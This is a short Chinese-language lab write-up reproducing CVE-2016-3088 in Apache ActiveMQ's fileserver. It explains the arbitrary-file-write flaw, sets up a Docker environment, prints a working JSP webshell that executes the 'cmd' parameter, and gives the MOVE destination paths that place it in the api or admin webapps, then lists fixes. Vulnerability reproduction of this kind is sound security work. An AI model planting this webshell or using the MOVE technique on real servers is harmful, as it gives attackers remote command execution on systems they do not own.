activemq/CVE-2016-3088漏洞复现
原理
影响版本:Apache ActiveMQ 5.x~5.14.0
漏洞原理:ActiveMQ的web控制台分三个应用,admin、api和fileserver,其中admin是管理员页面,api是接口,fileserver是储存文件的接口;admin和api都需要登录后才能使用,fileserver无需登录。本漏洞出现在fileserver应用中,漏洞原理其实非常简单,就是fileserver支持写入文件(但不解析jsp),同时支持移动文件(MOVE请求)。所以,我们只需要写入一个文件,然后使用MOVE请求将其移动到任意位置,造成任意文件写入漏洞。
ActiveMQ在5.12.x~5.13.x版本中,默认关闭了fileserver这个应用(但是可以在conf/jetty.xml中开启);在5.14.0版本以后,彻底删除了fileserver应用。
参考文章
wp
开启漏洞环境
docker-compose up -d
查看
docker ps
访问端口
ip:8161
首先查看版本与绝对路径
IP:8161/admin/index.jsp?printable=trueip:8161/admin/test/systemProperties.jsp
使用bp抓包上传webshell
<%@ page import="java.io.*"%>
<%out.print("Hello</br>");String strcmd=request.getParameter("cmd");String line=null;Process p=Runtime.getRuntime().exec(strcmd);BufferedReader br=new BufferedReader(new InputStreamReader(p.getInputStream()));while((line=br.readLine())!=null){out.print(line+"</br>");}
%>
直接修改,点击send后自动计算报文长度
将文件移动到api文件夹中
Destination:file:///opt/activemq/webapps/api/5.jsp
或者
Destination:file:///opt/activemq/webapps/admin/5.jsp
查看是否上传成功
利用
修复
1.升级至5.14.0
2.通过移除 conf\jetty.xml 的以下配置来禁用 ActiveMQ Fileserver 功能
_ 会写文件,程序便有了记忆)
_ 会读文件,程序便有了眼睛)
